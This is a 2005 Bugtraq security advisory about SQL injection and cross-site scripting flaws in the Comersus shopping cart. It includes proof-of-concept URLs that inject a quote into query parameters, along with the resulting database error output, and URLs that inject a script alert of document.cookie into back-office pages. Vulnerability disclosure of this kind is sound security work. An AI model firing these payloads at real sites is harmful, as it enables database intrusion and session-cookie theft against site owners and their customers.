[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    [Bday release] Comersus shopping cart has multiple Sql injection
From:       dcrab () hackerscenter ! com
Date:       2005-07-07 13:08:43
Message-ID: 20050707130843.2821.qmail () securityfocus ! com
[Download RAW message or body]

Dcrab 's Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies

******************************
SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND \
                EMAILS TO DCRAB@HACKERSCENTER.COM
******************************

Get Dcrab's Services to audit your Web servers, scripts, networks, etc or even code \
them. Learn more at http://www.dbtech.org

Severity: High
Title: Comersus shopping cart has multiple Sql injection and Cross Site Scripting \
                vulnerabilities
Date: 8/07/2005

Vendor: Comersus
Vendor Website: http://www.comersus.com
Vendor Status: Contacted but no reply
Summary: There are, multiple sql injection and cross site scripting vulnerabilities \
in Comersus Shopping Cart


Proof of Concept Exploits: 

www.comersus.com/comersus6/store/comersus_optAffiliateRegistrationExec.asp?name=1&email='&Submit=Join%20now%21
 SQL INJECTION

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression \
'idProduct=''.

/comersus6/includes/databaseFunctions.asp, line 39

http://www.comersus.com/comersus6/store/comersus_optReviewReadExec.asp?idProduct='&description=Dr%252E%2BSolomon%2560s%2BVirex%2B6%252E0%2B%2528For%2BMacintosh%2529
 SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression \
'idProduct=''.

/comersus6/includes/databaseFunctions.asp, line 39


www.comersus.com/backofficetest/backOfficePlus/comersus_backoffice_listAssignedPricesToCustomer.asp?idCustomer=7&name=><script>alert(document.cookie);</script>
 Cross Site Scripting

www.comersus.com/backofficetest/backOfficePlus/comersus_backoffice_message.asp?message=><script>alert(document.cookie);</script>
 Cross Site Scripting


Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah and at \
http://www.hackerscenter.com

Author: 
These vulnerabilities have been found and released by Diabolic Crab, Email: \
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me \
regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or \
http://www.dbtech.org/. Lookout for my soon to come out book on Secure coding with \
php.


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic